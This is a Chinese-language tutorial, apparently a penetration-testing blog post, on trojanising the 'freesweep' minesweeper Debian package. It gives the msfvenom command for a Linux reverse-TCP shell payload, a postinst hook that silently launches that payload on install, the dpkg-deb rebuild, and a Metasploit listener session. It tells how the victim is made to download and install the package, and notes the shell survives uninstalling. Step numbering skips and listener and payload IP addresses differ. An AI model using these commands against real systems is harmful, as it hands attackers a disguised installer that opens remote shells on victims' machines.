一、下载正常软件包
apt --download-only install freesweep //下载但不安装软件包freesweep
二、复制到root用户加目录下
为了便于后续操作,复制该软件包到root用户加目录下
默认apt下载后软件包位置路径为:/var/cache/apt/archives/
四、解压软件包
将deb包解压
五、生成恶意代码到软件源文件中
msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp lhost=192.168.85.176 lport=5555 -b “\x00” -i 10 -f elf -o /root/free/usr/games/freesweep_sources
六、天见软件包信息
拓展:生成软件包时无论是payload的和软件包信息都需要选择能够在目标操作系统上执行的。
创建软件包信息目录,如不创建,则会导致软件包无法执行。
Package:freesweep
Version:1.0.1-1
Section:Games and Amusement
Priority:optional
Architecture:amd64
Maintainer:Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
Description:text-based minesweeper
在特定路径下的特定文件中添加软件包的描述信息:
mkdir -p /root/free/DEBIAN && cd /root/free/DEBIAN
vim control
七、创建包含后门的deb软件包
┌──(root?kali)-[~/free/DEBIAN]
└─# vim postinst
#!/bin/bash
sudo chmod 2755 /usr/games/freesweep_sources
sudo /usr/games/freesweep_sources &
给postinst文件添加执行权限
chmod 755 postinst
重新生成带后门的deb软件包
dpkg-deb --build /root/free
九、开启监听
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.86.176
lhost => 192.168.86.176
msf6 exploit(multi/handler) > show options
msf6 exploit(multi/handler) > exploit
十、对方下载并安装(触发)
访问http://192.168.85.176/free.deb //下载
dpkg -i free.deb //安装完成即触发
dpkg -r freesweep //卸载软件包
如发现恶意软件包被卸载,payload依旧正常运行,
exit退出即可